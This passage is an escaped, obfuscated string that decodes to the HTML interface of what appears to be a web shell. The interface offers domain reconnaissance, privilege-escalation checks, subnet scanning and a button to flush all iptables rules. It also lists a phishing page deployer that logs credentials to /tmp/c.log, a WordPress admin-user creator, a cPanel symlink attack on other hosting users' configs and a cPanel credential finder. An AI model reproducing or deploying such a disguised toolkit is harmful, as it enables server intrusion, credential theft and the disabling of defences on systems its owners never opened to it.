3d\x22\x76\x69\145\167\55\144\x6f\x6d\x61\x69\x6e\x2d\x69\x6e\164\145\154\x22\40\143\154\x61\x73\x73\x3d\42\x76\x69\x65\167\x2d\x63\x6f\x6e\x74\x61\x69\x6e\x65\162\42\76\74\144\151\x76\40\143\154\x61\163\x73\x3d\x22\143\x6f\156\164\x65\156\164\x2d\150\145\141\x64\145\162\x22\x3e\x44\x6f\155\x61\151\x6e\x20\x49\156\164\145\154\154\x69\x67\145\x6e\143\145\x3c\57\x64\151\x76\76\74\144\151\x76\40\143\x6c\141\x73\x73\75\42\x63\157\x6e\164\145\x6e\164\55\141\x72\x65\x61\42\76\x3c\144\x69\x76\x20\143\154\x61\163\x73\x3d\42\x74\157\157\x6c\x2d\x73\145\143\x74\151\x6f\x6e\42\x3e\x3c\150\63\76\x53\x65\162\166\x65\162\40\104\157\155\141\151\x6e\x20\x52\x65\143\x6f\156\156\141\x69\x73\x73\141\x6e\x63\145\x3c\x2f\150\x33\76\74\x70\40\163\x74\x79\x6c\145\x3d\x22\143\x6f\x6c\157\162\x3a\x20\x76\141\162\50\x2d\x2d\x74\x65\170\x74\x2d\x6d\145\x64\51\73\x22\x3e\101\165\x74\157\155\141\164\151\143\x61\x6c\154\171\x20\147\141\164\150\x65\x72\40\151\x6e\164\145\x6c\154\x69\147\x65\156\143\145\x20\157\156\40\x74\x68\145\40\163\x65\x72\x76\x65\162\47\x73\x20\160\x72\151\155\x61\x72\x79\x20\x64\x6f\x6d\x61\151\156\x20\x28\x3c\x73\164\x72\157\x6e\x67\40\x69\144\75\42\x69\x6e\164\x65\154\55\x68\157\x73\x74\x2d\156\141\x6d\x65\42\x3e\x3c\57\x73\x74\162\x6f\x6e\147\x3e\51\x2e\40\124\150\x69\163\x20\x69\x6e\143\154\x75\144\x65\163\40\104\x4e\x53\x20\x72\x65\143\x6f\162\x64\163\54\40\x6f\x74\150\x65\162\40\x77\145\x62\163\151\164\145\x73\x20\x6f\x6e\x20\x74\x68\145\x20\163\x61\x6d\x65\x20\111\120\54\40\141\x6e\144\40\141\x20\161\x75\151\143\153\40\163\143\x61\156\40\146\x6f\162\40\143\x6f\155\155\157\156\x20\163\165\x62\x64\x6f\155\141\151\x6e\163\56\74\x2f\160\x3e\74\x62\x75\x74\164\x6f\156\x20\x69\144\75\42\x72\165\x6e\55\144\157\155\x61\151\156\55\x69\x6e\164\145\x6c\x2d\142\164\156\x22\x3e\107\141\164\x68\x65\x72\40\x49\x6e\x74\145\154\154\x69\147\x65\156\x63\x65\x3c\x2f\142\165\164\164\157\x6e\x3e\x3c\57\144\x69\x76\76\74\144\x69\166\40\x69\144\x3d\42\x64\157\155\141\x69\x6e\55\151\156\x74\145\x6c\x2d\162\145\x73\x75\x6c\164\163\x22\40\163\x74\171\x6c\x65\x3d\42\x64\x69\x73\x70\x6c\x61\x79\72\156\157\156\x65\x3b\40\x6d\x61\162\147\x69\156\55\x74\x6f\160\72\40\62\162\145\x6d\x3b\x22\76\74\x68\162\x3e\x3c\x68\63\76\104\116\123\x20\x52\x65\143\x6f\162\x64\163\74\57\x68\63\76\x3c\160\162\145\40\151\x64\75\42\x69\x6e\x74\145\154\x2d\144\x6e\x73\55\x6f\165\164\160\165\x74\x22\x20\x63\154\x61\x73\x73\75\x22\157\x75\x74\x70\165\x74\55\142\x6f\x78\42\76\74\x2f\x70\162\x65\76\x3c\x68\162\76\x3c\150\63\76\x4f\x74\150\x65\x72\40\123\x69\x74\145\163\x20\x6f\x6e\x20\x53\x65\x72\166\145\x72\40\50\74\x73\160\x61\156\x20\x69\x64\75\42\x69\x6e\164\145\x6c\55\151\160\x2d\x61\144\x64\x72\x22\76\74\57\x73\160\x61\156\x3e\x29\74\x2f\x68\63\76\74\160\40\163\164\171\x6c\x65\75\42\x63\x6f\154\x6f\162\72\x20\x76\141\162\50\x2d\x2d\164\145\170\164\x2d\x6d\145\144\x29\x3b\40\146\157\156\x74\55\163\x69\172\145\72\x20\60\x2e\70\162\145\x6d\73\x22\x3e\120\157\167\x65\x72\x65\x64\x20\x62\x79\40\x48\141\x63\x6b\x65\162\124\x61\162\147\145\164\56\x63\x6f\155\40\x41\120\x49\x3c\x2f\x70\x3e\x3c\x70\x72\145\40\x69\x64\75\x22\x69\156\164\145\x6c\x2d\162\145\x76\x65\x72\163\x65\55\151\160\55\157\165\164\x70\165\x74\42\40\143\x6c\x61\163\x73\x3d\x22\x6f\165\164\x70\x75\x74\55\142\x6f\x78\x22\76\74\x2f\160\162\x65\x3e\74\150\162\76\74\x68\63\x3e\103\x6f\155\x6d\x6f\156\x20\123\x75\142\144\157\155\141\151\156\163\x20\106\157\165\x6e\x64\x3c\57\x68\63\76\74\160\x72\x65\x20\151\144\75\x22\x69\x6e\164\x65\x6c\x2d\163\x75\142\x64\157\x6d\x61\151\x6e\x73\55\x6f\165\164\160\x75\164\42\x20\x63\x6c\x61\x73\x73\x3d\x22\157\x75\x74\160\x75\164\x2d\x62\x6f\x78\42\x3e\x3c\x2f\x70\162\x65\76\x3c\57\144\151\x76\x3e\x3c\57\x64\151\166\x3e\x3c\x2f\x64\151\x76\76\xa\x20\40\40\x20\40\x20\40\40\74\x64\151\x76\40\151\144\x3d\42\166\151\145\x77\x2d\x61\x74\164\x61\143\153\55\145\x76\141\163\x69\x6f\156\x22\40\143\154\x61\163\163\75\42\166\151\x65\x77\55\x63\157\x6e\x74\141\151\156\145\x72\42\x3e\x3c\x64\x69\166\40\x63\154\141\163\163\x3d\x22\x63\x6f\x6e\164\145\x6e\164\55\x68\x65\x61\144\x65\162\42\x3e\x41\x74\x74\x61\143\x6b\40\46\x20\105\166\141\x73\x69\157\x6e\40\x53\x75\x69\164\x65\74\57\x64\x69\166\x3e\x3c\x64\151\166\40\143\x6c\141\163\x73\75\42\x63\157\x6e\x74\x65\x6e\164\x2d\x61\162\x65\x61\42\x3e\74\144\151\x76\40\x63\154\x61\x73\163\75\x22\164\141\x62\x73\x22\x3e\x3c\x73\x70\x61\156\40\143\154\141\163\163\75\42\164\141\x62\x2d\x6c\151\x6e\153\x20\x61\x63\164\151\166\x65\42\40\x64\141\x74\141\55\x74\141\x62\75\42\x70\162\151\166\x65\163\143\42\x3e\120\162\x69\166\x69\x6c\145\x67\145\40\105\163\143\x61\154\x61\x74\151\x6f\x6e\x3c\57\x73\160\x61\x6e\76\x3c\163\160\141\156\40\143\154\x61\163\163\x3d\42\164\x61\x62\55\154\151\156\153\x22\40\x64\141\x74\x61\x2d\x74\141\x62\x3d\42\163\165\142\156\x65\164\x2d\x73\x63\141\156\42\x3e\x49\x6e\164\145\162\x6e\141\x6c\40\116\145\x74\x77\x6f\162\x6b\74\x2f\x73\160\x61\x6e\76\x3c\x73\x70\x61\156\x20\x63\x6c\141\163\163\75\42\164\x61\142\55\x6c\151\x6e\153\42\x20\x64\141\x74\x61\x2d\164\141\142\x3d\x22\x65\x76\141\163\x69\157\156\x22\76\105\166\141\x73\151\x6f\x6e\x3c\x2f\x73\x70\141\156\76\74\x73\160\x61\156\x20\143\154\141\163\x73\x3d\x22\164\141\142\x2d\154\151\156\x6b\x22\x20\x64\141\164\141\x2d\164\141\142\x3d\x22\160\150\151\x73\150\x69\x6e\x67\42\x3e\120\x68\151\x73\x68\x69\156\147\x3c\57\x73\x70\141\x6e\76\74\x2f\x64\x69\166\76\74\144\x69\166\x20\151\144\x3d\x22\x74\141\142\55\160\162\x69\x76\x65\x73\x63\42\40\143\x6c\x61\x73\163\x3d\42\164\141\142\55\x63\157\156\164\145\156\x74\40\141\x63\x74\151\166\x65\x22\76\x3c\x64\151\166\x20\143\x6c\x61\x73\163\x3d\42\x74\x6f\157\x6c\x2d\x73\145\x63\x74\x69\157\x6e\x22\x3e\x3c\x68\63\40\x73\x74\x79\154\x65\75\x22\155\141\162\147\151\156\55\x74\157\160\72\60\73\x22\76\x41\165\164\157\155\141\164\x65\x64\40\120\162\x69\166\151\x6c\145\147\x65\x20\105\x73\143\141\154\x61\164\x69\x6f\x6e\x20\103\x68\145\x63\x6b\x65\162\x3c\x2f\x68\x33\76\74\x70\x20\163\x74\x79\x6c\145\x3d\x22\x63\157\x6c\x6f\x72\72\40\166\141\x72\x28\55\x2d\x74\145\x78\164\x2d\155\x65\144\51\x3b\42\x3e\x52\x75\x6e\x20\143\157\x6d\160\x72\145\150\145\156\x73\x69\x76\x65\x20\x63\150\x65\x63\153\x73\x20\x66\x6f\x72\40\x63\157\155\155\157\156\x20\160\162\x69\x76\151\154\x65\x67\145\x20\x65\163\x63\x61\x6c\x61\164\151\157\156\x20\166\x65\143\x74\x6f\x72\163\x20\x6f\156\x20\114\x69\156\x75\x78\40\x61\156\144\x20\127\151\x6e\x64\157\167\163\56\74\57\x70\x3e\74\144\151\x76\76\74\x73\145\x6c\145\143\164\40\x69\144\75\42\x70\x72\151\166\x65\163\143\55\157\x73\x2d\x74\x79\160\x65\42\x20\163\164\x79\154\x65\x3d\42\167\x69\144\164\150\72\61\x35\60\x70\x78\73\x20\x6d\x61\162\147\151\156\55\162\x69\x67\x68\x74\72\x31\x72\x65\155\73\42\76\74\x6f\160\x74\x69\157\156\x20\x76\x61\154\x75\x65\x3d\42\x6c\x69\156\165\x78\42\x3e\x4c\x69\156\x75\170\74\x2f\x6f\160\164\151\x6f\x6e\76\x3c\x6f\x70\164\151\157\x6e\40\166\141\154\165\x65\x3d\x22\x77\x69\x6e\144\x6f\x77\x73\x22\x3e\127\151\x6e\x64\x6f\167\163\x3c\x2f\x6f\160\164\x69\x6f\156\76\x3c\57\x73\x65\x6c\x65\143\x74\x3e\x3c\x62\x75\164\164\157\x6e\x20\151\144\75\x22\162\165\x6e\x2d\x70\x72\151\x76\145\163\143\55\143\x68\145\x63\x6b\145\x72\55\x62\164\x6e\42\x3e\x52\165\156\x20\103\150\145\x63\153\163\x3c\57\x62\x75\164\x74\x6f\x6e\76\x3c\57\x64\151\x76\76\x3c\x70\x72\145\40\151\x64\75\x22\x70\x72\x69\x76\145\163\x63\x2d\143\x68\145\x63\153\x65\x72\55\157\165\x74\160\165\x74\x22\x20\143\154\141\x73\x73\75\x22\x6f\165\x74\160\x75\164\x2d\142\x6f\170\42\76\74\x2f\x70\x72\145\x3e\x3c\57\144\x69\x76\76\x3c\x2f\x64\151\x76\x3e\x3c\144\151\166\40\x69\144\x3d\42\164\x61\142\x2d\x73\165\x62\156\x65\164\x2d\163\x63\141\156\42\40\x63\154\x61\x73\x73\x3d\42\164\x61\142\55\143\x6f\156\164\x65\x6e\164\x22\76\x3c\x64\151\x76\x20\x63\x6c\141\163\x73\x3d\x22\164\x6f\x6f\x6c\x2d\x73\145\143\x74\151\157\x6e\42\x3e\74\x68\63\40\163\164\171\154\x65\x3d\x22\155\141\x72\x67\151\156\55\x74\x6f\x70\x3a\60\73\42\76\111\156\x74\145\x72\x6e\x61\x6c\x20\x53\x75\x62\x6e\x65\164\x20\123\143\x61\156\156\x65\x72\74\57\x68\63\x3e\x3c\x70\x20\163\164\x79\x6c\145\x3d\x22\143\x6f\x6c\157\x72\x3a\40\x76\141\162\x28\x2d\x2d\x74\145\170\x74\55\155\x65\144\51\73\x22\x3e\x53\143\x61\156\x20\141\x6e\40\x69\x6e\x74\145\x72\156\x61\x6c\40\x6e\145\x74\167\x6f\x72\153\40\162\141\x6e\147\145\x20\x74\x6f\x20\x64\151\x73\143\157\x76\x65\162\x20\x6c\x69\x76\x65\x20\150\x6f\x73\x74\163\40\141\156\144\40\157\160\145\156\x20\x70\x6f\162\x74\x73\56\x3c\x2f\x70\76\74\x64\x69\x76\76\74\x69\156\x70\165\x74\40\x74\x79\x70\145\75\42\164\145\x78\164\42\40\151\144\75\x22\x73\165\x62\x6e\x65\164\x2d\163\143\141\x6e\55\164\x61\162\147\145\x74\x22\x20\x70\154\141\143\145\150\x6f\154\144\x65\x72\75\x22\x53\165\142\156\145\x74\x20\50\x65\56\x67\56\x2c\40\x31\71\x32\x2e\61\x36\70\x2e\x31\56\60\57\62\x34\51\42\40\x73\x74\x79\154\145\75\42\146\x6c\x65\x78\72\x31\x3b\40\155\x61\x72\x67\151\156\55\x72\151\147\150\x74\72\61\x72\145\155\73\x22\76\74\142\x75\164\164\x6f\x6e\x20\x69\144\75\x22\162\165\x6e\x2d\x73\165\x62\x6e\145\164\x2d\x73\x63\x61\156\x2d\x62\x74\x6e\42\76\123\143\x61\156\x20\x53\165\x62\x6e\145\x74\74\57\142\165\x74\x74\x6f\156\x3e\x3c\57\x64\151\x76\x3e\74\160\x72\145\x20\x69\144\x3d\x22\163\165\142\x6e\x65\x74\55\163\143\x61\156\x2d\x6f\x75\x74\160\x75\x74\42\40\x63\154\141\163\163\x3d\x22\157\x75\x74\160\x75\x74\55\x62\x6f\170\42\x3e\x3c\x2f\160\162\145\x3e\x3c\57\x64\x69\166\76\74\57\144\151\166\x3e\74\x64\151\166\40\x69\x64\75\x22\x74\141\142\55\145\x76\x61\163\x69\157\x6e\x22\x20\x63\154\x61\x73\x73\x3d\42\x74\x61\142\x2d\143\x6f\156\x74\x65\156\x74\42\x3e\x3c\x64\151\166\40\143\x6c\x61\x73\163\75\x22\x74\x6f\x6f\x6c\x2d\x73\145\143\x74\x69\157\156\x22\x3e\74\x68\63\40\163\x74\x79\x6c\x65\75\42\x6d\141\162\147\x69\x6e\55\x74\x6f\x70\72\x30\x3b\42\x3e\x46\x69\x72\145\x77\141\x6c\x6c\40\x43\x6f\156\x74\162\157\x6c\x20\x28\151\160\164\x61\x62\154\145\x73\51\x3c\57\150\63\76\x3c\160\40\163\x74\171\x6c\145\75\x22\x63\157\154\157\162\72\x20\166\x61\162\x28\55\x2d\x74\145\x78\x74\55\x6d\x65\144\x29\x3b\x22\x3e\x56\x69\x65\167\x20\x61\156\x64\x20\x61\164\x74\x65\x6d\x70\164\x20\164\157\40\146\x6c\x75\x73\x68\x20\x66\151\x72\145\x77\x61\x6c\154\x20\162\165\x6c\x65\x73\x2e\x20\122\145\x71\x75\x69\x72\145\163\x20\x61\x70\x70\162\157\160\x72\151\x61\x74\x65\40\x70\x65\162\155\151\163\x73\151\157\x6e\x73\56\74\x2f\x70\76\x3c\144\151\x76\76\74\x62\165\164\164\157\156\40\x69\144\x3d\x22\166\151\145\167\x2d\x66\151\162\145\x77\x61\154\154\55\142\x74\156\x22\x3e\126\151\145\167\40\151\x70\164\x61\142\x6c\145\163\x20\122\x75\154\145\x73\74\x2f\142\x75\x74\x74\157\x6e\x3e\x3c\142\165\164\x74\157\156\x20\151\x64\75\x22\x66\x6c\x75\163\x68\55\146\x69\162\145\x77\x61\154\154\55\x62\164\156\x22\x20\x63\x6c\141\163\x73\75\42\144\141\156\147\x65\x72\55\x62\164\156\42\40\163\x74\171\x6c\145\75\x22\x6d\141\162\x67\151\156\55\154\145\x66\164\x3a\40\60\x72\x65\155\73\x22\76\x46\x6c\x75\x73\x68\x20\101\154\154\40\151\160\x74\x61\x62\x6c\x65\x73\40\122\x75\x6c\x65\x73\x3c\x2f\142\x75\164\x74\x6f\156\x3e\x3c\57\144\151\x76\x3e\x3c\160\x72\x65\40\151\144\x3d\x22\x66\x69\162\145\x77\x61\154\154\x2d\157\165\x74\x70\x75\164\x22\x20\x63\154\141\163\x73\75\42\x6f\165\164\x70\165\164\55\142\157\x78\42\76\74\57\x70\162\145\76\x3c\x2f\x64\151\x76\x3e\74\x2f\x64\x69\166\x3e\74\144\151\166\x20\x69\x64\x3d\x22\164\141\142\x2d\x70\x68\x69\163\x68\151\156\147\x22\x20\143\154\141\163\x73\75\x22\164\141\142\x2d\143\157\156\x74\x65\x6e\x74\x22\76\74\144\151\166\x20\143\154\141\163\163\x3d\42\x74\x6f\157\154\x2d\163\145\x63\x74\x69\157\156\x22\x3e\74\150\63\x20\x73\x74\x79\154\145\x3d\42\x6d\141\162\x67\x69\156\x2d\x74\x6f\x70\72\x30\73\42\x3e\120\x68\151\163\x68\151\156\147\x20\x50\141\x67\x65\x20\x44\x65\x70\154\157\x79\145\162\74\57\x68\x33\x3e\74\160\x20\163\164\171\x6c\145\75\x22\x63\x6f\x6c\x6f\162\x3a\40\166\141\x72\50\55\55\164\145\170\x74\55\155\x65\144\x29\x3b\x22\x3e\111\156\163\164\141\156\164\154\171\x20\144\x65\160\154\x6f\x79\x20\x61\x20\147\x65\x6e\x65\x72\151\143\x20\x61\144\x6d\151\x6e\x20\154\157\x67\151\x6e\40\x70\150\151\163\x68\x69\x6e\147\x20\160\x61\147\145\x2e\x20\103\162\x65\x64\145\x6e\164\151\x61\x6c\x73\x20\167\151\x6c\154\40\x62\x65\x20\163\141\166\x65\144\x20\164\x6f\40\x3c\143\x6f\144\145\x20\x73\x74\x79\x6c\x65\x3d\42\x62\x61\x63\153\x67\162\157\x75\156\x64\72\x76\141\x72\x28\55\x2d\x62\147\55\154\151\147\150\164\x29\73\x70\x61\x64\144\x69\x6e\147\x3a\62\x70\170\x20\64\160\x78\73\42\76\57\164\155\x70\57\143\56\154\157\x67\x3c\57\x63\157\144\x65\76\40\x6f\156\40\164\150\x65\x20\x73\145\x72\x76\x65\162\56\x3c\x2f\x70\x3e\74\x64\151\x76\x20\163\x74\171\x6c\x65\x3d\x22\144\x69\163\160\154\141\x79\x3a\146\154\x65\x78\x3b\40\x67\141\x70\72\40\61\x72\x65\x6d\x3b\x20\x61\x6c\151\147\x6e\55\x69\164\x65\155\x73\x3a\x63\145\x6e\x74\145\x72\73\42\x3e\74\x69\156\160\x75\x74\x20\164\171\160\145\75\42\164\x65\170\164\42\40\151\144\x3d\x22\x70\x68\151\x73\150\x2d\x64\145\x70\x6c\x6f\171\x2d\160\141\164\x68\x22\40\160\x6c\x61\x63\145\150\157\154\144\145\162\x3d\42\127\x72\151\x74\141\x62\x6c\145\40\104\151\162\145\x63\x74\x6f\162\x79\x20\120\141\x74\150\x22\x20\x73\x74\x79\x6c\145\75\x22\x66\x6c\x65\170\72\x31\x3b\x22\76\x3c\x69\156\160\x75\164\x20\x74\171\160\145\x3d\42\x74\x65\x78\x74\x22\x20\151\144\x3d\x22\160\150\151\163\150\x2d\x64\x65\160\x6c\157\x79\x2d\146\x69\x6c\145\156\141\155\x65\42\40\166\x61\154\x75\145\x3d\42\154\157\x67\x69\156\x2e\160\x68\160\x22\x20\163\x74\171\x6c\x65\x3d\x22\167\x69\x64\x74\150\x3a\x31\65\60\x70\170\73\x22\x3e\x3c\x62\x75\164\164\x6f\156\x20\x69\144\75\x22\x64\x65\x70\x6c\x6f\171\x2d\x70\x68\151\163\x68\x2d\x62\164\156\42\x20\x63\x6c\141\163\x73\x3d\42\x64\x61\x6e\x67\x65\162\55\x62\164\156\42\x3e\x44\x65\x70\154\157\x79\40\x50\x61\x67\x65\x3c\57\x62\165\164\x74\x6f\x6e\76\74\x2f\144\151\166\x3e\74\144\x69\x76\x20\151\x64\75\42\160\x68\x69\163\150\55\144\145\160\154\x6f\171\x2d\x6f\165\x74\x70\x75\x74\42\x20\x73\164\171\154\145\75\x22\155\x61\162\x67\x69\156\55\x74\157\160\72\61\162\145\155\x3b\42\76\74\57\x64\x69\x76\x3e\74\x2f\144\151\x76\x3e\74\x2f\x64\x69\x76\76\x3c\x2f\x64\151\x76\76\74\x2f\144\x69\x76\x3e\12\40\40\x20\x20\40\40\40\x20\x20\74\144\x69\166\40\x69\x64\x3d\42\166\x69\145\x77\x2d\x66\151\x6e\147\x65\x72\x70\x72\151\156\164\42\40\143\x6c\x61\x73\163\x3d\x22\x76\151\145\x77\x2d\143\157\156\164\141\151\x6e\x65\162\x22\x3e\x3c\144\x69\x76\40\143\x6c\x61\163\163\x3d\x22\x63\x6f\x6e\164\145\156\164\x2d\x68\x65\141\x64\x65\x72\x22\x3e\x53\145\162\166\145\x72\40\x46\x69\156\x67\145\x72\x70\x72\x69\156\x74\x3c\x2f\144\x69\x76\x3e\74\144\151\166\x20\143\x6c\x61\x73\163\x3d\x22\143\x6f\x6e\x74\145\156\164\55\141\162\145\141\42\x3e\x3c\x64\151\x76\40\x63\x6c\x61\x73\163\75\x22\x74\157\x6f\x6c\55\163\145\x63\164\151\x6f\x6e\x22\76\74\x70\x20\163\164\x79\154\x65\75\42\x63\157\154\x6f\x72\72\40\x76\x61\162\50\x2d\x2d\x74\x65\x78\164\x2d\155\145\144\51\x3b\x22\x3e\107\141\x74\x68\x65\162\40\x64\145\x74\x61\151\x6c\145\x64\x20\151\156\146\x6f\x72\155\141\x74\x69\x6f\156\40\141\142\157\165\164\40\164\x68\x65\x20\x73\145\162\166\x65\x72\47\163\40\x63\157\156\146\151\147\165\x72\x61\x74\x69\x6f\156\x2c\x20\x69\x6e\x63\x6c\165\x64\151\156\x67\40\163\x6f\x66\x74\x77\141\162\x65\x2c\40\163\145\162\x76\x69\143\x65\163\x2c\x20\141\156\x64\40\160\141\143\153\x61\x67\145\163\x2e\74\x2f\x70\x3e\x3c\x62\x75\164\164\x6f\x6e\40\151\144\x3d\42\162\x75\156\55\x66\x69\156\147\x65\162\x70\x72\151\156\164\x2d\142\x74\156\x22\x3e\x47\141\164\x68\145\x72\x20\123\x65\162\x76\145\x72\x20\x46\x69\156\147\145\162\x70\162\x69\x6e\x74\74\x2f\142\x75\164\164\157\x6e\76\74\57\144\151\166\76\74\144\x69\x76\x20\151\x64\75\42\x66\151\156\147\145\x72\x70\162\x69\156\164\55\x72\145\163\x75\x6c\164\163\42\40\163\164\x79\x6c\x65\75\42\144\x69\x73\160\154\x61\x79\72\x6e\x6f\x6e\145\x3b\x20\155\141\162\x67\151\156\x2d\164\157\x70\x3a\x20\62\162\x65\x6d\73\x22\76\x3c\57\144\151\166\x3e\x3c\57\x64\x69\x76\x3e\x3c\x2f\144\x69\166\x3e\12\x20\x20\40\x20\x20\x20\x20\x20\40\74\144\151\166\x20\151\144\75\x22\x76\151\x65\167\55\143\160\141\x6e\x65\x6c\x2d\x63\155\x73\42\x20\x63\x6c\x61\x73\163\x3d\x22\x76\151\x65\x77\x2d\x63\157\x6e\x74\141\x69\156\145\162\42\76\74\144\x69\x76\x20\143\154\141\x73\x73\75\42\x63\x6f\x6e\164\x65\156\164\55\150\145\x61\144\145\162\42\x3e\103\115\123\40\x26\40\x63\120\141\156\x65\154\40\x54\157\x6f\x6c\x73\74\57\144\151\166\76\x3c\144\151\x76\40\143\x6c\x61\x73\163\x3d\42\x63\157\156\x74\145\156\x74\55\141\x72\x65\141\42\76\x3c\x64\x69\166\40\143\x6c\141\163\x73\75\42\164\x6f\x6f\154\55\x73\x65\143\x74\151\157\x6e\x22\x3e\x3c\x68\63\76\127\x6f\x72\x64\x50\x72\145\163\x73\x20\x41\144\155\151\x6e\40\x55\x73\x65\x72\40\x43\x72\145\141\x74\x6f\162\x3c\57\x68\63\x3e\x3c\160\40\163\x74\x79\154\x65\x3d\x22\143\157\x6c\157\162\x3a\40\166\x61\162\x28\x2d\x2d\164\145\x78\x74\55\155\145\x64\51\73\x22\x3e\106\x69\x6e\144\x73\40\x61\x20\x3c\x63\157\x64\x65\40\163\164\x79\x6c\145\75\42\x62\x61\x63\x6b\x67\x72\x6f\x75\156\x64\72\x76\x61\x72\x28\55\x2d\142\147\x2d\x6c\x69\x67\150\x74\x29\x3b\x70\x61\144\x64\x69\156\147\x3a\62\x70\170\40\64\x70\170\x3b\x22\x3e\x77\x70\55\x63\x6f\156\x66\151\147\56\160\x68\x70\x3c\x2f\x63\x6f\x64\145\x3e\x20\x66\151\x6c\x65\x20\141\x6e\144\40\141\x64\144\163\40\141\40\x6e\145\x77\x20\141\x64\x6d\x69\156\40\x75\x73\145\162\40\164\157\40\x74\150\x65\40\144\x61\164\141\x62\141\x73\x65\x2e\x3c\57\160\76\74\144\x69\x76\40\x63\x6c\x61\x73\x73\x3d\x22\164\157\x6f\x6c\x2d\x69\156\x70\x75\164\x2d\147\162\x6f\x75\160\42\76\74\x69\156\x70\x75\x74\40\164\171\160\145\75\42\x74\x65\x78\164\x22\x20\x69\x64\x3d\42\x77\x70\x2d\x63\x6f\x6e\146\151\147\x2d\x70\x61\x74\150\x22\40\x70\x6c\x61\x63\145\x68\157\154\144\x65\x72\x3d\42\120\x61\x74\150\x20\x74\x6f\x20\167\x70\55\143\157\x6e\146\151\x67\x2e\160\150\x70\x22\76\x3c\x69\x6e\x70\165\164\x20\164\x79\160\x65\75\x22\x74\x65\x78\164\42\x20\151\144\x3d\x22\x77\160\x2d\156\145\x77\x2d\x75\163\145\162\x22\x20\160\x6c\x61\x63\145\150\x6f\154\144\x65\x72\x3d\42\116\145\167\x20\x55\163\x65\x72\156\x61\155\x65\x22\x3e\x3c\x69\156\160\165\x74\40\x74\x79\x70\x65\75\42\x70\141\163\163\167\x6f\162\x64\42\40\151\x64\x3d\x22\x77\160\55\156\145\x77\55\x70\x61\x73\163\42\40\160\154\141\143\145\x68\x6f\x6c\x64\x65\162\75\42\116\x65\167\x20\x50\x61\163\x73\x77\x6f\x72\x64\42\76\x3c\x69\x6e\x70\x75\x74\40\164\x79\160\x65\x3d\x22\164\145\x78\164\x22\x20\151\x64\x3d\42\167\160\x2d\x6e\x65\x77\x2d\145\155\141\151\154\x22\40\x70\x6c\141\x63\x65\x68\157\x6c\x64\145\162\x3d\42\116\x65\x77\x20\105\x6d\141\x69\154\x20\x41\144\144\162\145\163\163\42\x3e\x3c\x2f\x64\151\x76\x3e\x3c\x62\165\x74\164\157\x6e\x20\151\144\75\42\143\x72\145\141\164\x65\55\x77\160\x2d\x75\163\x65\162\x2d\142\164\x6e\42\x20\143\x6c\x61\163\163\x3d\x22\x64\x61\x6e\147\145\x72\55\x62\164\x6e\x22\x3e\x43\x72\145\x61\164\x65\40\x41\x64\x6d\x69\156\x20\x55\x73\145\x72\74\x2f\142\165\164\x74\x6f\156\x3e\x3c\x2f\x64\x69\166\x3e\74\150\162\x3e\74\x64\x69\166\x20\x63\x6c\x61\x73\x73\x3d\x22\x74\x6f\157\x6c\55\163\145\x63\x74\x69\x6f\156\42\76\x3c\150\x33\x3e\x63\x50\x61\x6e\x65\154\x20\123\x79\155\154\151\156\153\145\x72\74\57\x68\x33\x3e\74\160\40\x73\164\171\x6c\145\75\x22\143\157\x6c\x6f\162\x3a\40\x76\141\162\50\55\55\x74\x65\x78\x74\x2d\x6d\145\x64\51\x3b\x22\76\x41\164\x74\x65\155\x70\164\40\x74\x6f\40\162\145\x61\144\x20\143\157\x6e\146\151\147\x20\146\x69\x6c\x65\163\x20\157\146\x20\x6f\164\x68\145\x72\x20\x75\163\145\162\x73\x20\x6f\x6e\x20\x73\150\141\162\x65\x64\40\150\157\x73\x74\x69\x6e\x67\40\166\x69\141\40\x73\x79\155\142\157\154\151\143\x20\x6c\151\156\x6b\x73\x2e\74\x2f\160\76\74\163\x65\154\145\143\x74\40\x69\144\x3d\42\163\x79\x6d\x6c\x69\156\x6b\55\164\x61\x72\147\145\x74\55\165\163\145\162\42\x20\163\164\171\154\145\75\x22\x77\151\x64\x74\150\72\61\60\x30\x25\73\x20\155\x61\x72\x67\x69\x6e\55\142\157\x74\164\x6f\x6d\x3a\x31\x72\x65\155\73\x22\x3e\74\57\x73\145\x6c\145\143\164\x3e\74\x62\165\164\x74\x6f\x6e\x20\x69\144\x3d\42\162\x75\x6e\55\x73\171\x6d\154\151\156\153\x2d\142\164\156\42\76\122\x75\156\40\x53\171\x6d\x6c\151\156\x6b\40\101\164\x74\x61\x63\x6b\x3c\x2f\x62\165\x74\164\157\x6e\76\x3c\x64\151\x76\x20\x69\x64\75\42\163\x79\x6d\154\x69\x6e\153\55\162\145\x73\x75\x6c\x74\163\42\x20\x73\164\x79\x6c\x65\75\x22\x6d\141\162\x67\151\x6e\x2d\x74\x6f\160\72\61\x72\x65\155\73\42\x3e\74\57\x64\151\166\76\74\x2f\144\x69\x76\76\74\x68\x72\76\x3c\144\x69\x76\40\143\x6c\141\163\x73\75\42\164\x6f\157\154\55\163\x65\143\164\151\x6f\156\42\x3e\74\x68\x33\x3e\106\x69\156\144\40\143\x50\x61\156\x65\x6c\x20\103\162\x65\144\x65\x6e\x74\x69\141\154\x73\74\57\150\63\x3e\74\160\40\163\164\171\x6c\x65\75\42\143\157\154\157\162\72\40\x76\141\162\x28\55\x2d\x74\145\x78\164\55\155\145\144\x29\73\x22\x3e\x4c\x6f\x6f\x6b\x73\40\x66\157\162\x20\x63\120\x61\156\145\154\x20\143\162\x65\144\145\156\164\151\x61\x6c\40\x66\151\x6c\x65\x73\x20\x6c\x69\153\x65\x20\x3c\143\x6f\x64\145\40\x73\x74\x79\154\145\75\42\142\x61\x63\153\147\162\157\x75\x6e\x64\72\x76\x61\x72\x28\x2d\x2d\142\147\55\154\x69\147\x68\x74\x29\73\x70\x61\144\144\x69\156\x67\x3a\62\x70\170\x20\64\160\x78\x3b\x22\x3e\176\x2f\x2e\154\x61\163\x74\x6c\157\x67\151\x6e\74\x2f\x63\157\x64\x65\x3e\x20\x66\x6f\x72\x20\x74\150\145\x20\143\165\162\x72\145\x6e\164\40\x75\163\145\x72\56\x3c\x2f\x70\76\74\142\x75\164\x74\x6f\x6e\x20\151\144\x3d\x22\x66\151\x6e\144\x2d\x63\x70\141\156\145\154\x2d\x63\162\x65\x64\x73\x2d\142\164\x6e\x22\x3e\106\151\156\144\40\103\162\145\144\145\x6e\x74\x69\x61\x6c\x73\x3c\57\142\165\x74\x74\x6f\156\76\x3c\160\162\x65\x20\x69\144\75\42\143\160\x61\156\145\154\x2d\x63\162\x65\144\x73\55\x6f\165\x74\x70\x75\164\x22\40\x63\154\141\x73\163\x3d\42\157\165\x74\160\165\x74\55\x62\157\x78\x22\76\74\x2f\160\x72\x65\76\74\x2f\x64\151\x76\76\74\x2f\144\151\166\76\x3c\57\x64\151\